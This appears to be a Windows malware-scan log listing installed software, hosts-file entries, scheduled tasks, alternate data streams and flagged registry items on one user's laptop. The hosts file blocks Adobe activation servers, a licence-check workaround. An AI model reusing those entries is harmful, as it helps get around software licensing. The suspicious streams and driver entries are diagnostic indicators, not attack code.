Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.50727 (Version: 11.0.50727 - Microsoft Corporation) Hidden
Microsoft Web Publishing Wizard 1.52 (HKLM-x32\...\WebPost) (Version:  - )
Microsoft_VC80_ATL_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_ATL_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_CRT_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFC_x86_x64 (Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86 (x32 Version: 8.0.50727.4053 - Adobe) Hidden
Microsoft_VC80_MFCLOC_x86_x64 (Version: 80.50727.4053 - Adobe) Hidden
Microsoft_VC90_ATL_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_ATL_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_CRT_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86 (x32 Version: 1.00.0000 - Adobe) Hidden
Microsoft_VC90_MFC_x86_x64 (Version: 1.00.0000 - Adobe) Hidden
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
My Dell (HKLM\...\PC-Doctor for Windows) (Version: 3.5.6426.22 - PC-Doctor, Inc.)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.1.0 - Nikon)
Nikon Movie Editor (HKLM-x32\...\{5CAD3393-EEC0-44CE-9F93-BCAA365B77FB}) (Version: 2.7.0 - Nikon)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.3 - Notepad++ Team)
OtsAV DJ 1.90.015 (HKLM-x32\...\OtsAV DJ) (Version:  - )
PC Pitstop Optimize3 3.0 (HKLM-x32\...\PC Pitstop Optimize3_is1) (Version: 3.0.0.42 - PC Pitstop)
PDF Settings CS5 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
Picture Control Utility x64 (HKLM\...\{11953C65-BB4E-4CA4-B0F0-2600A4B20040}) (Version: 1.4.11 - Nikon)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
POOL Player (HKLM-x32\...\com.promoonly.online.POOL.8BB1F44190BE209F9DAD807CFDEF7E1135FDA399.1) (Version: Version 3.3.18 - Promo Only, Inc.)
POOL Player (x32 Version: 3.3.18 - Promo Only, Inc.) Hidden
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
PxMergeModule (x32 Version: 1.00.0000 - Your Company Name) Hidden
QandAi-II (HKLM-x32\...\{B4B882C8-A973-4736-A14C-E36E5B694818}) (Version: 1.0.3 - DigiGames)
QATI (HKLM-x32\...\{1C7C16F9-4B70-49CB-88C8-569BA7C24D0B}) (Version: 6.0.0004 - DigiGames)
QATI (HKLM-x32\...\{7DD2847D-CB78-40CB-97A5-15E604539E78}) (Version: 6.0.0010 - DigiGames)
Qualcomm Gobi 2000 Package for Dell (HKLM-x32\...\{5030C973-F5BA-4432-860C-A3DA77BFEB05}) (Version: 1.1.100 - QUALCOMM)
Quicken 2011 (HKLM-x32\...\{5FE545A1-D215-4216-9189-E7B39C9D1CC1}) (Version: 20.1.8.6 - Intuit)
Quicken 2012 (HKLM-x32\...\{0A1E0BDA-5E8F-436d-8BE5-7E97C5CB899D}) (Version: 21.1.7.18 - Intuit)
Quicken 2013 (HKLM-x32\...\{034DD4BB-F0D6-4ECF-B064-8E39E3EF7076}) (Version: 22.1.12.7 - Intuit)
Quicken 2014 (HKLM-x32\...\{0877F595-254F-45F4-991D-3F72E86B17CE}) (Version: 23.1.7.6 - Intuit)
Quicken WillMaker Plus 2013 (HKLM-x32\...\{8065044B-2AF3-434E-A6E2-B7C60CDB978B}) (Version: 1.0.0.0 - Nolo)
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 9.6.21 - Dell Inc.)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
QuizMaster (HKLM-x32\...\{B1C7D7DC-CDAB-4540-8600-BCE5A553C179}) (Version: 1.0.4102 - DIGIGAMES)
R3DriverInstall (HKLM-x32\...\R3DriverInstall_is1) (Version:  - )
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
RICOH Media Driver ver.2.07.01.02 (HKLM-x32\...\{2B818257-E6C7-4841-8C29-C5C9A982BCE5}) (Version: 2.07.01.02 - RICOH)
Roxio BackOnTrack (x32 Version: 4.0 - Roxio) Hidden
Roxio Burn (x32 Version: 1.6 - Roxio) Hidden
Roxio CinePlayer (x32 Version: 5.6 - Roxio) Hidden
Roxio CinePlayer Decoder Pack (x32 Version: 4.3.0 - Roxio) Hidden
Roxio Creator 2011 (HKLM-x32\...\{4433FF9E-AF21-4E41-B296-4E13BF4D52F5}) (Version: 13.0 - Roxio)
Roxio Creator 2011 (x32 Version: 1.3.166 - Roxio) Hidden
Roxio Creator 2011 (x32 Version: 6.0.0 - Roxio) Hidden
Roxio Creator 2011 Content (x32 Version: 13.0.098 - Roxio) Hidden
Roxio PhotoShow (HKLM-x32\...\Roxio PhotoShow) (Version: 6.0 - Sonic Solutions)
Roxio Video Capture USB (x32 Version: 1.22.0000 - Roxio) Hidden
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
SmartSound Common Data (HKLM-x32\...\InstallShield_{B8A2869E-30CA-40C5-9CF8-BD7354E57EF8}) (Version: 1.1.0 - SmartSound Software Inc.)
SmartSound Common Data (x32 Version: 1.1.0 - SmartSound Software Inc.) Hidden
SmartSound Quicktracks 5 (HKLM-x32\...\InstallShield_{2F8BA3FD-1FA9-4279-B696-712ABB12F09F}) (Version: 5.1.7 - SmartSound Software Inc.)
SmartSound Quicktracks 5 (x32 Version: 5.1.7 - SmartSound Software Inc.) Hidden
Take It Or Leave It (HKLM-x32\...\Take It Or Leave It_is1) (Version:  - )
TalentHunt (HKLM-x32\...\{F8E2027F-FBB9-4902-9045-25C63F38028F}) (Version: 1.0.11 - DIGIGAMES)
The Print Shop 23.1 (HKLM-x32\...\{0C8C6F56-41FA-44F6-8107-DCFAA7EFD601}) (Version: 23.1.11 - Broderbund Software)
Total Commander 64-bit (Remove or Repair) (HKLM\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH)
Trivia Board Pro 4 (HKLM-x32\...\Trivia Board Pro 4_is1) (Version:  - )
Trivia Feud (HKLM-x32\...\Trivia Feud_is1) (Version:  - )
Trivia Fortune (HKLM-x32\...\Trivia Fortune_is1) (Version:  - )
Trivia Ladder (HKLM-x32\...\Trivia Ladder_is1) (Version:  - )
Trivia Squares (HKLM-x32\...\Trivia Squares_is1) (Version:  - )
Tweaking.com - Windows Repair (All in One) (HKLM-x32\...\Tweaking.com - Windows Repair (All in One)) (Version: 2.8.0 - Tweaking.com)
Update for Microsoft Access 2010 (KB2553446) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{FEF4C57D-0975-4D3C-ACC7-DCD038C3788F}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{84B191B5-5319-463A-A305-8C4D53B1D20A}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{DB0B0CDF-77EC-47B0-94E2-4738573A1E58}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{428CB7A0-1068-4CE1-8835-39C7ECD297ED}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{79C725A1-3964-421C-A528-78C1C083C7C7}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{95BE5D45-A3DD-4CB1-8C35-D75DD7B4D862}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{EBD18DE5-BC84-4B57-9A30-097044871F9A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{4AD36582-256B-433D-8593-F31773A15CA4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{F216169C-2B40-429B-8370-B5BA06EC5423}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{B6AD7E27-012A-4B63-82BA-AF62893E5435}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{07DC9C6C-E916-4F42-8677-716930ED0393}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{6E760BBA-B83F-4C2D-918F-5F91EF6C9861}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-040C-1000-0000000FF1CE}_Office14.SingleImage_{9F6507AC-7D8F-46C1-B90F-59C7828E0E0D}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2850079) 64-Bit Edition (HKLM\...\{90140000-001F-0C0A-1000-0000000FF1CE}_Office14.SingleImage_{E84E9B25-BEB6-4F2F-84BB-755CDA8E89C0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878225) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{8A6BDA63-4D23-4485-A466-8979E10BCF49}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{3029C408-1DD1-4273-8E58-87CB1B638FC8}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-001A-0409-1000-0000000FF1CE}_Office14.SingleImage_{DBAC8ED2-9287-499E-AD66-590C7413C7DE}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{DDDC32A5-9528-4771-B91A-97A8E1D7957B}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{90140000-0018-0409-1000-0000000FF1CE}_Office14.SingleImage_{393B360E-62F8-463D-B914-1ECDC1359A46}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A20A650C-F820-4CE4-AEA5-EC140192FAFB}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 64-Bit Edition (HKLM\...\{90140000-0043-0000-1000-0000000FF1CE}_Office14.SingleImage_{77374F16-2DC6-4EEF-AFAD-C59FDA2E010D}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{F6F342A1-530B-4D48-A468-1E3F70928984}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{C950A55F-82E3-4CC8-8FA2-E8A2A0F651F3}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{89FDC8D9-FB84-4EFE-950D-AF4EECC3B64C}) (Version:  - Microsoft)
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
ViewNX 2 (HKLM\...\{635BE602-BB9C-4C59-8CC5-93F9366E8A21}) (Version: 2.7.5 - Nikon)
WIDCOMM Bluetooth Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9600 - Broadcom Corporation)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Family Safety (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger Companion Core (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Remote Client (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Client Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live Remote Service Resources (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Media Center Add-in for Flash (HKLM-x32\...\{E2D09AC2-4153-4817-AAEB-24F92A8BCE88}) (Version: 4.1.2.0 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM-x32\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)

==================== Restore Points  =========================

05-07-2014 23:54:40 Windows Backup
14-07-2014 15:20:40 Tweaking.com - Windows Repair
14-07-2014 16:38:39 Tweaking.com - Windows Repair
15-07-2014 18:17:55 Windows Backup
15-07-2014 18:50:28 Windows Backup

==================== Hosts content: ==========================

2009-07-13 22:34 - 2011-12-12 11:44 - 00001509 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 adobe.activate.com
127.0.0.1 adobeereg.com
127.0.0.1 www.adobeereg.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 125.252.224.90
127.0.0.1 125.252.224.91
127.0.0.1 hl2rcv.adobe.com

==================== Scheduled Tasks (whitelisted) =============

Task: {00D1E803-9EB0-4DAB-8FD2-5A70367A90A8} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28] (Google Inc.)
Task: {1E99649A-5C34-41E6-9D5C-6B6A1C1C3CCC} - \Scheduled Update for Ask Toolbar No Task File <==== ATTENTION
Task: {301A0A26-686A-47AB-8410-BA6B7A51D46D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {31482516-5CE1-494C-A9DE-CDA22FC32E49} - System32\Tasks\{5F6010C8-60E5-41f3-BF5B-C3AF5DBE12D4} => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {384DE5BC-5F63-40D3-ABB4-A297FBB546AF} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {41139198-1592-4711-A556-F3852D5D33BD} - System32\Tasks\Carbonite Upgrade Check => C:\ProgramData\Carbonite\Carbonite Backup\CarboniteUpgrade.exe
Task: {4773C2E6-2290-4912-8954-305C9DE708C6} - System32\Tasks\Apple Diagnostics => C:\Program Files (x86)\Common Files\Apple\Internet Services\EReporter.exe [2013-11-20] (Apple Inc.)
Task: {538F0BF6-C5B5-445F-8E21-0540E20500AE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06] (Google Inc.)
Task: {5C883933-4F04-48F9-A1AF-A77BC1A98103} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06] (Google Inc.)
Task: {92F87B66-E033-4923-80DC-C27F79A8B290} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28] (Google Inc.)
Task: {C76636F5-BADB-4669-B87E-90AF0058C63C} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {C91124DE-30E0-4E60-A6E0-AB710876F70F} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-10] (PC-Doctor, Inc.)
Task: {E2BF828E-529C-4297-97BC-9AE74B9BE264} - System32\Tasks\AdobeAAMUpdater-1.0-Dell-XPS-1645-Ric => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2010-03-06] (Adobe Systems Incorporated)
Task: {F2AD24AB-2A5C-4290-B252-B4E6EF0391E5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-06-13] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job => C:\Users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2009-06-02 19:05 - 2009-06-02 19:05 - 00457200 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe
2010-07-14 04:00 - 2010-07-14 04:00 - 00032240 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\BService.exe
2011-02-27 20:25 - 2007-08-02 19:45 - 00262239 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvc.exe
2013-05-23 17:54 - 2011-09-06 07:02 - 00140456 _____ () C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE
2014-05-12 05:49 - 2014-05-12 05:49 - 00222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll
2014-06-16 09:38 - 2009-11-26 11:53 - 00447488 ____R () C:\Program Files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe
2011-02-27 20:25 - 2007-08-02 19:46 - 00110685 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSched.exe
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2010-07-14 04:00 - 2010-07-14 04:00 - 01587696 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\BEngine.dll
2010-07-14 04:00 - 2010-07-14 04:00 - 00107504 _____ () C:\Program Files (x86)\Roxio\BackOnTrack\App\Logging.dll
2011-02-27 20:25 - 2007-08-02 19:46 - 00233573 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapEngine.dll
2011-02-27 20:25 - 2007-08-02 19:46 - 00032768 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLCapSvcps.dll
2014-07-16 10:41 - 2014-07-16 10:41 - 00043008 _____ () c:\users\ric\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpwjih6l.dll
2013-08-23 15:01 - 2013-08-23 15:01 - 25100288 _____ () C:\Users\Ric\AppData\Roaming\Dropbox\bin\libcef.dll
2014-06-16 09:38 - 2009-03-25 20:08 - 00058880 ____R () C:\Program Files (x86)\Dell\Dell WWAN\WMCore\MBMDebug.dll
2011-02-27 20:25 - 2007-08-02 19:46 - 00065631 _____ () C:\Program Files (x86)\ATI\Catalyst Media Center\Kernel\TV\CLSchMgr.dll
2014-02-13 10:22 - 2014-02-13 10:22 - 00170496 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\bfd5296be62268bc7a31a424f0d1ad5f\IsdiInterop.ni.dll
2011-02-26 00:00 - 2010-03-03 21:08 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll

==================== Alternate Data Streams (whitelisted) =========

AlternateDataStreams: C:\Users\Ric\Local Settings:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\Application Data:eze3UMfrJWx7rnYl4ZabQcSdDo9
AlternateDataStreams: C:\Users\Ric\AppData\Local\QX98MGlBll:ICLtGXGuvbHk9JsjsurofG6fTog
AlternateDataStreams: C:\Users\Ric\AppData\Local\Temp:u7mOtr3DxOBSIqOEV

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\51887692.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\51887692.sys => ""="Driver"

==================== EXE Association (whitelisted) =============

HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\.exe: exefile =>  <===== ATTENTION!
HKU\S-1-5-21-3536542363-2189832666-3084334477-1001\Software\Classes\exefile:  <===== ATTENTION!

==================== MSCONFIG/TASK MANAGER disabled items =========

MSCONFIG\Services: x10nets => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\Windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Event Reminder.lnk => C:\Windows\pss\Event Reminder.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^Ric^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^DING!.lnk => C:\Windows\pss\DING!.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Ric^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup
MSCONFIG\startupfolder: C:^Users^Ric^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^eFax 4.4.lnk => C:\Windows\pss\eFax 4.4.lnk.Startup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
